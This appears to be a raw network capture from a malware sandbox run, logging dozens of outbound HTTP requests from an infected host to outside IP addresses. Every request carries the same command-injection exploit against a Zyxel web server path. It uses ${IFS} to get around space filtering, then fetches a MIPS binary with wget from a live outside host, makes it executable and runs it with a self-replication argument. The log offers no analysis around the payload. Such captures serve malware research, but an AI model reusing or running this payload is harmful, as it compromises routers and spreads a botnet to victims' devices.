                                    Jan 13, 2024 19:02:47.489639997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7824192.168.2.1355682165.189.244.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489666939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7825192.168.2.1356714124.242.216.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489697933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7826192.168.2.1352282207.39.106.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489739895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7827192.168.2.1357830208.105.146.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489768028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7828192.168.2.135144696.60.27.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489810944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7829192.168.2.1339372211.100.51.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489876986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7830192.168.2.1347290198.89.215.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489923954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7831192.168.2.133803252.90.139.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.489959002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7832192.168.2.133496271.253.122.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490030050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7833192.168.2.134375275.174.31.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490072966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7834192.168.2.133991485.86.124.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490119934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7835192.168.2.134047691.131.10.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490199089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7836192.168.2.1343412152.71.103.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490230083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7837192.168.2.1358884189.115.121.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490259886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7838192.168.2.1335576125.154.167.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490304947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7839192.168.2.1333862197.180.138.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490349054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7840192.168.2.1360126188.104.155.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490391016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7841192.168.2.1359932169.202.74.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490432978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7842192.168.2.133556254.11.69.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490473032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7843192.168.2.1359244206.184.17.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490513086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7844192.168.2.133611884.133.144.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490590096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7845192.168.2.133418667.184.138.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490619898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7846192.168.2.134116837.226.229.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490677118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7847192.168.2.1344490209.173.93.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490753889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7848192.168.2.1358446132.142.4.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490791082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7849192.168.2.13329285.103.199.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490793943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7850192.168.2.135091898.67.73.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490840912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7851192.168.2.135703625.11.35.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490885973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7852192.168.2.133834651.13.52.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490928888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7853192.168.2.134012049.145.254.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.490995884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7854192.168.2.1349356144.103.129.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491024971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7855192.168.2.135038859.122.150.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491077900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7856192.168.2.1342936122.152.116.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491127968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7857192.168.2.1356244124.224.159.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491168022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7858192.168.2.1341236220.21.227.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491230965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7859192.168.2.134736639.20.16.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491298914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7860192.168.2.1343152222.56.138.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491341114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7861192.168.2.1341420103.3.61.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491408110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7862192.168.2.133990895.41.254.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491445065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7863192.168.2.135145249.53.209.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491514921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7864192.168.2.1351462176.116.20.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491550922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7865192.168.2.134758246.61.16.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491604090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7866192.168.2.134388295.238.198.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491650105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7867192.168.2.13604569.188.199.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491724014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7868192.168.2.1355582145.252.183.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491758108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7869192.168.2.135808093.198.79.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491801023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7870192.168.2.1342290191.80.156.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491889954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7871192.168.2.135974891.24.150.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491985083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7872192.168.2.1355710187.169.181.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.491992950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7873192.168.2.1338060146.221.187.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492039919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7874192.168.2.135626288.206.226.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492089033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7875192.168.2.134648624.237.27.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492152929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7876192.168.2.1335744159.77.29.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492211103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7877192.168.2.1346984182.201.14.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492249966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7878192.168.2.1334424132.135.48.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492312908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7879192.168.2.134554034.205.243.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492357969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7880192.168.2.135975664.129.191.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492371082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7881192.168.2.1358726116.183.62.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492413998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7882192.168.2.1337810212.68.73.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492471933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7883192.168.2.1357394132.134.15.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492525101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7884192.168.2.135172414.20.162.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492556095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7885192.168.2.136053091.250.129.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.492598057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7886192.168.2.1351868160.218.245.78443
                                    TimestampBytes transferredDirectionData
